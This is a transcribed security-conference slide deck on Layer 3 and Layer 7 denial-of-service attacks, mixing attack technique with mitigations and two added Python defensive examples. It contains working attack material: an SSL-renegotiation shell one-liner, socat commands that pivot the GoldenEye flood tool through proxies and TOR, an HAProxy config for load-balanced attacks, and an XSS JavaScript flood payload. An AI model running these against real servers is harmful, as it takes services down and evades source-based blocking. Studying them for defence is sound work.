The document discusses denial-of-service (DoS) attacks and their targets at different layers of the OSI model. Layer 3 attacks target bandwidth consumption through techniques like ping floods and SYN floods. Layer 7 attacks target application resources through vectors like SSL handshake renegotiation to cause intense CPU usage on the server. The document outlines how Layer 7 attacks are more stealthy and efficient at causing damage than Layer 3 attacks.
2. $ whoami
Full Name: Jan Seidl
Origin: Rio de Janeiro, RJ – Brazil
Work:
● Technical Coordinator @ TI Safe
● OpenSource contributor for: PEV, Logstash
● Codes and snippets @ github.com/jseidl
Features:
● UNIX Evangelist/Addict/Freak (but no fanboy!)
● Python and C lover
● Coffee dependent
● Hates printers and social networks
● Proud DC Labs Member
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
3. agenda
0x0 Introduction to Denial-of-Service
0x1 Background: Layer 3 attacks
0x2 Attacking Layer 7: Fundamentals
0x3 Attacking Layer 7: Vectors & Tools
0x4 WebServer DoS Mitigation 101
0x5 Proxies (SOCKS/TOR) and Layer 7 attacks
0x6 Jericho Attack Technique: Load-balancing attacks
0x7 XSS D/DoS
0x8 Size doesn't matter: Mobile-launched Denial-of-Service
0x9 Demo/Video: GoldenEye MdoS Android Tool
0xA Questions?
4. Introduction to Denial-of-Service
What is denial of service?
5. Introduction to Denial-of-Service
What is denial of service?
A denial-of-service attack (...), is an attempt to make a machine or network resource unavailable to its intended users.
Source: Wikipedia/en_US
6. Introduction to Denial-of-Service
7. Introduction to Denial-of-Service
Result?
8. Introduction to Denial-of-Service
Result?
9. Introduction to Denial-of-Service
10. Introduction to Denial-of-Service
Symptoms
Oddly low performance
Unavailability of given resource
Unavailability of all resources
11. Introduction to Denial-of-Service
Recent Cases
13. Introduction to Denial-of-Service
18. Introduction to Denial-of-Service
Targets (OSI layer)
Network (Layer 3)
Bandwidth consumption
Application (Layer 7)
Application or operating system resources consumption
19. Introduction to Denial-of-Service
Network (Layer 3)
Bandwidth consumption
20. Background: Layer 3 attacks
Popular Attacks
Ping Flood
(…) is a simple denial-of-service attack where the attacker overwhelms the victim with ICMP Echo Request (ping) packets (...) The attacker hopes that the victim will respond with ICMP Echo Reply packets, thus consuming both outgoing bandwidth as well as incoming bandwidth.
Source: Wikipedia/en_US
21. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
22. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
23. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
24. Background: Layer 3 attacks
Popular Attacks
SYN Flood
25. Background: Layer 3 attacks
Popular Attacks
SYN Flood
26. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
“When the sum of the offset and size of one fragmented packet differ from that of the next fragmented packet, the packets overlap, and the server attempting to reassemble the packet can crash, especially if it is running an older operating system that has this vulnerability.”
http://www.juniper.net/techpubs/software/junos-es/junos-es93/junos-es-swconfigsecurity/understanding-teardrop-attacks.html
27. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
28. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
29. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
30. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
31. Attacking Layer 7: Fundamentals
Application (Layer 7)
Application or operating system resources consumption
32. Attacking Layer 7: Fundamentals
Focus
Layer 3: Exhaust bandwidth
Layer 7: Exhaust application or operating system key resources
33. Attacking Layer 7: Fundamentals
Stealthiness
Layer 3: High network noise (noisy attack)
Layer 7: Low network noise, might emulate legit requests
34. Attacking Layer 7: Fundamentals
Efficiency
Layer 3: Requires lots of participants for a significant outage. May be blocked by sparring
Layer 7: Sometimes only one machine can cause damage. Difficult to block
35. Attacking Layer 7: Fundamentals
Mitigation
Layer 3: Large link, connection limiting, rate-limiting, sparring
Layer 7: ?
36. Attacking Layer 7: Fundamentals
Layer 7 attack targets
Intense CPU, disk I/O and swapping operations, long/slow/complex queries
Finite application resources: maximum socket limits, maximum memory limits, disk space etc.
37. Attacking Layer 7: Vectors & Tools
38. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
15% more processing power is needed on the server than on the client to establish the handshake.
In the wild since 2003.
Still affects most implementations.
Found by the THC group (www.thc.org) in 2011
39. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
Tool:
THC-SSL-DOS <http://www.thc.org/thc-ssl-dos/>, or the shell one-liner (each background job keeps one TLS session open and sends 'R' to openssl s_client to request a renegotiation):
thcssldosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 127.0.0.1:443 2>/dev/null; done }
for x in `seq 1 100`; do thcssldosit & done
40. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
Affects any TLS/SSL secured protocol: HTTPS, SMTPS, POP3S, database secure ports etc.
Mitigation?
Turning off SSL renegotiation might help, but does not solve it
SSL accelerators might help, but also don't solve it 100%
IPTables mitigation: http://vincent.bernat.im/en/blog/2011-ssl-dos-mitigation.html
41. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Parallel requests of small GZIP'ed content parts
Forces the webserver to perform several parallel compression operations = high load
Discovered in 2011 (CVE-2011-3192)
42. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Tools:
killapache.pl <http://seclists.org/fulldisclosure/2011/Aug/175>
Slowhttptest <http://code.google.com/p/slowhttptest/>
43. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Mitigation:
SetEnvIf or mod_rewrite
(ref: http://httpd.apache.org/security/CVE-2011-3192.txt)
Use a WAF (Web Application Firewall)
Update Apache to version 2.2.21 or greater
44. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers, Slow Post, Slow Read
Read or send data in small chunks, with an interval between reads/writes.
Waiting for the full request is part of the web server's nature, so every slow connection keeps a connection slot busy.
45. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers: send request headers 'Slowly'
Slow Post: send request post body (post data) 'Slowly'
Slow Read: small TCP window size to force slow response reading
46. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers: send request headers 'Slowly'
GET / HTTP/1.1\r\n /* sleep(1) */
Connection: keep-alive\r\n /* sleep(1) */
...
47. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Post: send request post body (post data) 'Slowly'
Content-Type: application/x-www-form-urlencoded
Content-Length: 512
Accept: text/html;q=0.9,text/plain;q=0.8
foo=bar /* sleep(1) */
bar=baz /* sleep(1) */
baz=foo /* sleep(1) */
...
48. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Read: small TCP window size to force slow response reading
/* pseudocode */
int len = 1;
while (data = read(sock, buffer, len)) {
sleep(5);
…
}
49. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Tools:
Slow Headers: Slowloris, slowhttptest, OWASP HTTP Post Tool
Slow Post: RUDY, slowhttptest, OWASP HTTP Post Tool
Slow Read: slowhttptest
50. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks - Mitigation:
Slow Headers: request timeout (Apache's mod_reqtimeout), WAF
Slow Post: request timeout, WAF
Slow Read: disable pipelining and oddly slow window sizes, limit maximum request time, WAF
Good article on slow attacks mitigation:
https://community.qualys.com/blogs/securitylabs/2011/11/02/how-to-protect-against-slow-http-attacks
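As an added example (not from the slides and not mod_reqtimeout's own code), the request-timeout mitigation above can be expressed as a small header-read deadline: a hypothetical Python re-implementation of the `header=20-40,MinRate=500` semantics, with a replay function so a defender can check the policy against recorded arrival times before tuning the real server.

```python
"""Request-header read deadline modelled on Apache mod_reqtimeout's
'header=20-40,MinRate=500' semantics (hypothetical re-implementation, not
mod_reqtimeout's code): wait at most `initial` seconds for the headers,
extending the deadline by one second per `min_rate` bytes received, but
never beyond `maximum` seconds in total."""
import socket
import time

HEADER_END = b"\r\n\r\n"


class HeaderReadPolicy:
    def __init__(self, initial=20.0, maximum=40.0, min_rate=500):
        self.initial, self.maximum, self.min_rate = initial, maximum, min_rate

    def deadline(self, received):
        """Seconds after accept() by which the header block must be complete."""
        return min(self.maximum, self.initial + received / self.min_rate)

    def simulate(self, chunks):
        """Replay (seconds_since_accept, bytes) pairs without a live socket.
        Returns ('complete', t) or ('timeout', deadline_that_was_missed)."""
        buf, received = b"", 0
        for t, data in chunks:
            if t > self.deadline(received):
                return "timeout", self.deadline(received)
            buf, received = buf + data, received + len(data)
            if HEADER_END in buf:
                return "complete", t
        return "timeout", self.deadline(received)


def read_headers(conn, policy):
    """Read one request's header block from a blocking socket; return the bytes,
    or None when the client fell behind the policy (close the connection)."""
    start, buf, received = time.monotonic(), b"", 0
    while HEADER_END not in buf:
        remaining = policy.deadline(received) - (time.monotonic() - start)
        if remaining <= 0:
            return None
        conn.settimeout(remaining)
        try:
            data = conn.recv(4096)
        except socket.timeout:
            return None
        if not data:  # peer closed before finishing the headers
            return None
        buf, received = buf + data, received + len(data)
    return buf


if __name__ == "__main__":
    # Demo: only the request line arrives and then nothing more; a tight 0.3 s
    # policy gives up instead of holding the slot open indefinitely.
    server, client = socket.socketpair()
    client.sendall(b"GET / HTTP/1.1\r\n")
    print(read_headers(server, HeaderReadPolicy(initial=0.3, maximum=0.6)))  # None
    server.close()
    client.close()
```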
51. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache
Keep connections open and force cache regeneration.
First POC:
HULK – HTTP Unbearable Load King
Created in May 2012 by Barry Shteiman.
<http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/>
52. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache: HULK
Highly effective against IIS, Apache & reverse proxies
Caveat: written in Python with urllib2, which always sends headers in the same order (easy to fingerprint)
SpiderLabs: ModSecurity rule to mitigate urllib2-based attacks (HULK)
(http://blog.spiderlabs.com/2012/05/hulk-vs-thor-applicationdos-smackdown.html)
53. Attacking Layer 7: Vectors & Tools
Randomization FTW!
54. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache + Randomness: GoldenEye
● Author: Me! :)
● Initially born as a Hulk fork due to its fingerprinting weakness
● Transformed further into a new independent HTTP DoS Tool
● Born to test WAF blocking abilities under random and semi-natural payloads
● Available at https://github.com/jseidl/GoldenEye
55. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache + Randomness: GoldenEye
Main Features:
GET, POST or Random HTTP methods
Random headers quantity
Random Headers content with legit values as per RFC
Better random block function to avoid fingerprinting
Hackers to Hackers Conference 2012 – São Paulo, Brasil
56. Attacking Layer 7: Vectors & Tools
Mitigation
Granular page permissions
Filter POST where not needed
Filter querystring parameters where not needed
ProxyCache
Use caching proxies (ex: Varnish) and disable cache reload
KeepAlive and TimeOuts
Tune KeepAlive, TimeOut & KeepAliveTimeOut (Apache) and the equivalent in other webservers
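To make the first two mitigations concrete, an added example (not from the slides, and not any product's code): a per-page method and query-parameter allow-list placed in front of a minimal caching stand-in that never lets the client force a reload. The paths, allowed parameters and the proxy behaviour are constructed assumptions.

```python
"""Page-level request policy and client-proof caching, in the spirit of the
mitigation list above (granular page permissions, caching proxy with cache
reload disabled). The paths, allowed parameters and the proxy behaviour are
constructed assumptions for illustration, not any product's real rules."""
from urllib.parse import parse_qsl, urlencode

# Constructed allow-list: which methods and query parameters each page accepts.
PAGE_POLICY = {
    "/index.php": {"methods": {"GET", "HEAD"}, "params": set()},
    "/search.php": {"methods": {"GET", "HEAD"}, "params": {"q", "page"}},
    "/login.php": {"methods": {"GET", "POST"}, "params": set()},
}


def filter_request(method, path, query):
    """Return (status, normalized_query): 404 for unknown pages, 405 for a
    method the page does not accept; parameters the page does not use are
    dropped and the rest sorted, so random `?x=y` padding cannot create new
    cache entries or reach the application."""
    policy = PAGE_POLICY.get(path)
    if policy is None:
        return 404, ""
    if method.upper() not in policy["methods"]:
        return 405, ""
    kept = [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if k in policy["params"]]
    return 200, urlencode(sorted(kept))


class CachingFront:
    """Minimal stand-in for a caching reverse proxy placed before the web server.
    It never consults the client's Cache-Control/Pragma headers, so a client
    cannot force regeneration; `origin_hits` counts real renders."""

    def __init__(self, render):
        self.render, self.cache, self.origin_hits = render, {}, 0

    def handle(self, method, path, query="", headers=None):
        # `headers` is accepted to mirror a real request but deliberately
        # ignored for caching decisions (no client-triggered reloads).
        status, normalized = filter_request(method, path, query)
        if status != 200:
            return status, None
        key = path + ("?" + normalized if normalized else "")
        if key not in self.cache:
            self.origin_hits += 1
            self.cache[key] = self.render(key)
        return 200, self.cache[key]


if __name__ == "__main__":
    front = CachingFront(lambda key: "rendered " + key)
    # Fifty requests with random-looking parameters and no-cache headers,
    # the pattern HULK-style tools use; only the first one reaches the origin.
    for i in range(50):
        front.handle("GET", "/index.php", f"{i}={i * 7}", {"Cache-Control": "no-cache"})
    print("origin renders:", front.origin_hits)  # 1
    print(front.handle("POST", "/index.php"))    # (405, None)
```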
57. WebServer DoS Mitigation 101
58. WebServer DoS Mitigation 101
Apache
LimitRequestFields, LimitRequestFieldSize,
LimitRequestBody, LimitRequestLine,
LimitXMLRequestBody, TimeOut,
KeepAliveTimeOut, ListenBackLog,
MaxRequestWorkers [core]
RequestReadTimeout [mod_reqtimeout]
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
59. WebServer DoS Mitigation 101
Nginx
client_max_body_size, client_body_buffer_size,
client_header_buffer_size,
large_client_header_buffers, client_body_timeout,
client_header_timeout [core]
Modules: HttpLimitReqModule,
HttpLimitZoneModule
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
60. WebServer DoS Mitigation 101
IIS 6 & 7
IIS 6: connectionTimeout, HeaderWaitTimeout,
MaxConnections
IIS 7: <RequestLimits> maxAllowedContentLength,
maxQueryString, maxUrl
<headerLimits>
<Limits>/<WebLimits> connectionTimeout,
headerWaitTimeout, minBytesPerSecond
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
61. WebServer DoS Mitigation 101
USE A WEB APPLICATION FIREWALL (WAF)
Modsecurity (Apache / Nginx)
http://www.modsecurity.org/
NAXSI (Nginx)
http://code.google.com/p/naxsi/
62. Proxies and Layer 7 attacks
63. Proxies and Layer 7 attacks
Layer 3: bad to attack through proxies, as they usually have low bandwidth and you might get banned from them
Layer 7: requires low bandwidth; low network noise; not degraded by low output
64. Proxies and Layer 7 attacks
Why use proxies in HTTP attacks?
Simple answer
Geographic location at your will
Different source IPs
Can provide high anonymity
Largely available on the internet
65. Proxies and Layer 7 attacks
Attack pivoting by proxies
Tool:
Socat: Multipurpose Relay
http://www.dest-unreach.org/socat/
Also with SSL support:
HTTPS, IMAPS, POPS, LDAPS
66. Proxies and Layer 7 attacks
Attack pivoting by proxies: Regular Proxies
# socat TCP4-LISTEN:80 PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>
# echo "127.0.0.1 <VICTIM_HOST>" >> /etc/hosts
# ./goldeneye.py http://<VICTIM_HOST>/index.php -t 1000 -m get
67. Proxies and Layer 7 attacks
Attack pivoting by proxies: TOR
# socat TCP4-LISTEN:80,fork SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9052
# echo "127.0.0.1 <VICTIM_HOST>" >> /etc/hosts
# ./goldeneye.py http://<VICTIM_HOST>/index.php -t 1000 -m get
68. Proxies and Layer 7 attacks
Bonus: Multi-TOR
The TOR client supports spawning as many instances and opening as many circuits as necessary.
tor --RunAsDaemon 1 --CookieAuthentication 0 --HashedControlPassword "pwd" --ControlPort 4444 --PidFile torN.pid --SocksPort 5090 --DataDirectory data/torN
Tool:
Multi-TOR
https://github.com/jseidl/Multi-TOR/
Ex.: ./multi-tor.sh 5 # Opens 5 TOR instances
69. Proxies and Layer 7 attacks
Mitigating TOR with TORBlock
Blocking TOR-sourced access
TORBlock: IPTables-based blocking
Tool:
https://github.com/jseidl/torblock
70. Load Balancing Attacks
Meet Jericho
71. Load Balancing Attacks
Starring: HAProxy
“The Reliable, High Performance TCP/HTTP Load Balancer”
REQUEST → HAPROXY → { SERVER A, SERVER B, SERVER C }
72. Load Balancing Attacks
'Load-balanced' attacks anatomy
Attacker:
1. Open lots of socat tunnels to the victim, each one
from a different proxy (regular, TOR or both)
2. Put local port addresses (socat'ed ones) on
HAProxy
3. Place victim's domain on /etc/hosts
4. Attack normally from your favorite tool
73. Load Balancing Attacks
'Load-balanced' attacks anatomy
listen ddos 0.0.0.0:80
mode tcp
balance roundrobin
server inst1 localhost:8080
server inst2 localhost:8081
server inst3 localhost:8082
server inst4 localhost:8083
…
74. Load Balancing Attacks
'Load-balanced' attacks anatomy
75. Load Balancing Attacks
'Load-balanced' attacks anatomy
[Diagram: Attacker → HAProxy → Proxy 1 … Proxy 7 → Victim]
76. Load Balancing Attacks
'Load-balanced' attacks anatomy
77. Load Balancing Attacks
Dangers of 'load-balanced' attacks?
● Bypass connection-limiting
● DoS → DDoS
● Multiple origin IPs
● Origins can be from multiple countries
78. Load Balancing Attacks
Dangers of 'load-balanced' attacks?
79. Load Balancing Attacks
More about the Jericho Attack Technique
http://www.slideshare.net/jseidl/slides-the-jerichoattackperspective
80. XSS D/DoS
What if an XSS flaw could turn your visitors into D/DoS clients?
<script>
function DDoS() {
  a = new Date()
  unixepoch = a.getTime()
  elm = document.createElement("img")
  victimURL = "http://10.1.1.114/"
  elm.src = victimURL+"?"+unixepoch
}
setInterval("DDoS()",1);
</script>
81. Mobile-launched Denial-of-Service
PoC Tool: GoldenEye Mobile
82. Mobile-launched Denial-of-Service
Objective
Test if mobile devices alone could conduct a successful DoS attack.
Test if equipment and configurations are able to deter DoS attacks from mobile platforms.
83. Mobile-launched Denial-of-Service
Android: Limitations
Max 128 threads (Android 2.1)
Maximum number of concurrent sockets per thread: 30 (more than 30 gives "too many open files")
Can we get better results if the device is 'rooted' (sysctl)?
84. Mobile-launched Denial-of-Service
Firepower
5 min test on an Apache webserver, default configuration, in a Debian 6 virtual machine, also with default configuration.
CPU Usage: u5.85 s4.52 cu0 cs0 2.37% CPU load
Low CPU fingerprint
Server overloaded (a.k.a. down)
https://github.com/jseidl/GoldenEye-Mobile
85. Mobile-launched Denial-of-Service
GoldenEye Mobile: Mitigation
GoldenEye Mobile uses the HEAD method for maximum speed.
Easily blocked (module: mod_rewrite):
RewriteEngine on
RewriteCond %{THE_REQUEST} !^(GET|POST) /.* HTTP/1.1$
RewriteRule .* - [F]
mod_security:
SecFilterSelective REQUEST_METHOD "!^(GET|POST)$" "deny,auditlog,status:405"
86. Demo: DoS Fun
GoldenEye Mobile DoS Android Tool Demo!
http://bit.ly/GoldenEyeMDOS
87. Questions?
88. Thanks!
– To Peace!
89. Thanks!
Thanks for your time!
jseidl@wroot.org / http://wroot.org
https://github.com/jseidl
http://www.slideshare.net/jseidl
@jseidl